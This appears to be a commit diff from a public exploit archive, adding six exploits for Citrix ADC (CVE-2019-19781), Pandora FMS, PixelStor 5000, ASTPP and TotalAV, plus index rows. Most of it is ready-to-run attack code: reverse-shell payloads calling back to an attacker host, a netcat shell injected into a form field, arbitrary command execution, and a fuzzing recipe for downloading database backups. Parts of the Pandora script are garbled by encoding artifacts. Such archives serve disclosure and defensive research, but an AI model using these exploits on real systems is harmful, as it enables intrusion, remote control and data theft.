DB: 2020-01-11

6 changes to exploits/shellcodes

TotalAV 2020 4.14.31 - Privilege Escalation
Pandora 7.0NG - Remote Code Execution
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
ASTPP 4.0.1 VoIP Billing - Database Backup Download
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution

exploits/linux/webapps/47900.txt

@@ -0,0 +1,56 @@
+# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
+# Date: 2019-11-18
+# Exploit Author: Fabien AUNAY
+# Vendor Homepage: https://www.astppbilling.org/
+# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
+# Version: 4.0.1 vendor default setup script
+# Tested on: Debian 9 - CentOS 7
+# CVE : -
+
+###########################################################################################################
+ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
+
+A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
+It is available as an open source solution. It means without any investment, one can start his telephony
+business using ASTPP.
+ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
+comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
+solution to “A Smart TelePhony Platform”.
+The latest version of ASTPP is provisioned with some advanced functional modules which are designed
+to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
+4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
+Technology.
+
+When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
+the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
+
+The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
+
+Pattern review:
+- astpp_
+- year
+- month
+- day
+- 6 PIN digit
+
+Steps:
+Objective 1 : Generate your 6 PIN list
+Objective 2 : FUZZ the target URL
+Objective 3 : Download the mysqldump
+
+###########################################################################################################
+
+Objective 1: Generate your 6 PIN list
+POC: crunch 6 6 0123456789 > pin_fuzzer.list
+
+Objective 2 : FUZZ the target URL
+POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
+===================================================================
+ID           Response   Lines    Word     Chars       Payload
+===================================================================
+
+000080137:   200        1135 L   6859 W   550239 Ch   "080136"
+
+Objective 3 : Download the mysqldump
+POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
+astpp_20200110080136.sql.gz             100%[===============================================================================>] 296,70K  1,05MB/s    ds 0,3

exploits/multiple/webapps/47901.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
+# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
+# Release Date : 11/01/2020
+# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
+echo "=================================================================================
+ ___             _           _     ____                 ___           _  _
+| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _
+|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
+|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
+              |__/                                                 CVE-2019-19781
+================================================================================="
+##############################
+if [ -z "$1" ];
+then
+echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
+exit;
+fi
+filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
+curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
+echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
+echo -ne "Command Output :\n"
+curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is

exploits/multiple/webapps/47902.py

@@ -0,0 +1,132 @@
+#!/usr/bin/python3
+#
+# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+#
+# You only need a listener like netcat to catch the shell.
+#
+# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
+#
+# Tool Written by: Rob Simon and David Kennedy
+
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
+import random
+import string
+import time
+from random import randint
+import argparse
+import sys
+
+# random string generator
+def randomString(stringLength=10):
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(stringLength))
+
+# our random string for filename - will leave artifacts on system
+filename = randomString()
+randomuser = randomString()
+
+# generate random number for the nonce
+nonce = randint(5, 15) 
+
+# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
+# note that the file location will be in /netscaler/portal/templates/filename.xml
+def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
+
+    # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
+    encoded = ""
+    i=0
+    text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
+    while i < len(text):
+        encoded = encoded + "chr("+str(ord(text[i]))+") . "
+        i += 1
+    encoded = encoded[:-3]
+    payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
+    headers = ( 
+        {
+            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+            'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
+            'NSC_NONCE' : '%s' % (nonce),
+        })
+
+    data = (
+        {
+            "url" : "127.0.0.1",
+            "title" : payload,
+            "desc" : "desc",
+            "UI_inuse" : "a"
+        })
+
+    url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
+    requests.post(url, data=data, headers=headers, verify=False)
+
+# this is our second stage that triggers the exploit for us
+def stage2(filename, randomuser, nonce, victimip, victimport):
+    headers = (
+        {
+            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+            'NSC_USER' : '%s' % (randomuser),
+            'NSC_NONCE' : '%s' % (nonce),
+        })
+
+    requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
+
+
+# start our main code to execute
+print('''
+
+  .o oOOOOOOOo                                            OOOo
+    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
+    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
+    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
+    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
+    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
+    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
+   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
+  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
+ OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
+ "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
+    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
+    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
+    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
+                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
+                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
+    .                  .     OP"          : o     .
+                              :
+
+Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+Tool Written by: Rob Simon and Dave Kennedy
+Contributions: The TrustedSec Team 
+Website: https://www.trustedsec.com
+INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
+
+This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
+to append files in an XML format to the victim machine. This in turn allows for remote code execution.
+
+Be sure to cleanup these two file locations:
+    /var/tmp/netscaler/portal/templates/
+    /netscaler/portal/templates/
+
+Usage:
+
+python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')
+
+# parse our commands
+parser = argparse.ArgumentParser()
+parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
+parser.add_argument("targetport", help="the target server web port (normally on 443)")
+parser.add_argument("attackerip", help="the attackers reverse listener IP address")
+parser.add_argument("attackerport", help="the attackersa reverse listener port")
+args = parser.parse_args()
+print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
+print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
+# trigger our first post
+stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
+print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
+time.sleep(2)
+print("[*] Triggering GET request for the newly created file with a listener waiting...")
+print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
+print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
+# trigger our second post
+stage2(filename, randomuser, nonce, args.target, args.targetport)

exploits/php/webapps/47898.py

@@ -0,0 +1,71 @@
+# Exploit Title: Pandora 7.0NG - Remote Code Execution
+# Date: 2019-11-14
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2019-20224
+# Vendor Homepage: https://pandorafms.org/
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: v7.0NG
+# Tested on: CentOS 7.3 / PHP 5.4.16
+
+#!/usr/bin/python3
+
+import requests
+import sys
+
+if len(sys.argv) !=3D 6:
+    print("[+] Usage : ./exploit.py target username password ip port")
+    exit()
+
+target =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D int(sys.argv[5])
+
+request =3D requests.session()
+
+login_info =3D {
+    "nick": username,
+    "pass": password,
+    "login_button": "Login"
+}
+
+login_request =3D request.post(
+    target+"/pandora_console/index.php?login=3D1",
+    login_info,
+    verify=3DFalse,
+    allow_redirects=3DTrue
+ )
+
+resp =3D login_request.text
+
+if "User not found in database" in resp:
+    print("[-] Login Failed")
+    exit()
+else:
+    print("[+] Logged In Successfully")
+
+print("[+] Sending crafted graph request ..")
+
+body_request =3D {
+    "date": "0",
+    "time": "0",
+    "period": "0",
+    "interval_length": "0",
+    "chart_type": "netflow_area",
+    "max_aggregates": "1",
+    "address_resolution": "0",
+    "name": "0",
+    "assign_group": "0",
+    "filter_type": "0",
+    "filter_id": "0",
+    "filter_selected": "0",
+    "ip_dst": "0",
+    "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
+    "draw_button": "Draw"
+}
+
+draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
+on/netflow/nf_live_view&pure=3D0"
+print("[+] Check your netcat ;)")
+request.post(draw_url, body_request)

exploits/php/webapps/47899.py

@@ -0,0 +1,35 @@
+# Exploit Title: PixelStor 5000 - Remote Code Execution
+# Product: PixelStor 5000
+# Vendor: Rasilient
+# Date: 2020-01-08
+# Exploit Author: .:UND3R:.
+# Vendor Homepage: http://rasilient.com
+# Version: K:4.0.1580-20150629 (KDI Version)
+# Tested on: K:4.0.1580-20150629 (KDI Version)
+# CVE: CVE-2020-6756
+# URL Author: https://pwnedchile.com
+# Thanks: Dani Pelotocino <3, Roit
+
+import requests, sys
+
+def poc(target, cmd):
+	url = target + "/Option/languageOptions.php"
+	headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+	data = {"lang": ";" + cmd + ";/bin/echo -n en"}
+	r = requests.post(url, headers=headers, data=data)
+	if(r.status_code == 200):
+		print("\nPwned :]")
+	else:
+		print("\nNot vulnerable :(")
+
+print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
+
+if len(sys.argv) !=2:
+    print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
+    sys.exit(1)
+
+if __name__ == "__main__":
+	url = sys.argv[1]
+	cmd = raw_input("\n[Linux Command]:")
+	poc(url, cmd)
+#EoF

exploits/windows/local/47897.txt

@@ -0,0 +1,35 @@
+# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
+# Date: 2020-01-09
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://www.totalav.com/
+# Version: 4.14.31
+# Fixed on:  5.3.35
+# Tested on: Windows 10 x64
+# CVE : N/A
+
+# Vulnerability Description:
+# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
+# privilege by using NTFS directory junction.
+
+**You can download vulnerability version with this link:
+https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
+
+///////////////////////////////////
+   Proof of Concept
+//////////////////////////////////
+1. Plant the malicious file in this case we use DLL file
+2. To exploit the vulnerability antivirus must detect the malicious dll
+3. Move it to quarantine.
+4. Attacker must create NTFS directory junction to restore
+
+Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
+
+
+Vulnerability Disclosure Timeline:
+==================================
+17 Oct, 19 : Found Vulnerability
+18 Oct, 19 : Vendor Notification
+18 Oct, 19 : Request CVE
+21 Oct, 19 : Vendor Response
+mid Dec, 19  : Vendor released new patched (v5.3.35)
+09 Jan, 20: Vulnerability Disclosure

files_exploits.csv

@@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port
 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
 47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
+47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port
 47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
+47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
+47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
+47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
+47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
+47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,